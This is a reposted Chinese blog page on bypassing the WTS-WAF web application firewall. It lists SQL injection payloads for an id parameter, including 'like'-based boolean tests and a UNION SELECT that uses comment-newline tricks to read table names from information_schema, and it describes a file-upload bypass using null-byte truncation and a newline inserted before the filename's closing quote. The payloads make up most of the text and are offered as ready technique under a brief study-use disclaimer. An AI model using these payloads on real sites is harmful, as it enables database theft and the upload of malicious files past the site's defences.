碼上快樂

相關內容    簡體    繁體

bypass WTS-WAF(sql注入+文件上傳)

本文轉載自   查看原文   2020-08-19 10:35   1029 

sql注入

注入點:?id=13

payload:

?id=13'+and+'1'='1--+  攔截

 

 

 ?id=13'+and+1+like+1--+  不攔截,正常回顯

 ?id=13'+and+1+like+2--+  不攔截,回顯異常  判斷存在注入

?id=-13' union select--%0a1,2,3,4,5,(select--%0atable_name from information_schema.tables where table_schema="數據庫名" limit 2,1)--  繼續注入

文件上傳

 

 上面是上傳后的文件名,使用00截斷,下面是WTS-WAF檢測的文件名,可以通過在后面的雙引號前面換行來繞過后綴名檢測

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 WAF繞過之sql注入bypass Bypass ngx_lua_waf SQL注入防御(多姿勢) SQL注入bypass學習 [11期]繞過安全狗、雲鎖等各大WAF注入,上傳深入自動化Bypass攻擊 SQL注入WAF繞過姿勢 文件上傳bypass安全狗 SQL注入中的WAF繞過技術 繞過阿里雲waf進行SQL注入 SQL注入之WAF手工繞過 WAF攻防研究之四個層次Bypass WAF
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM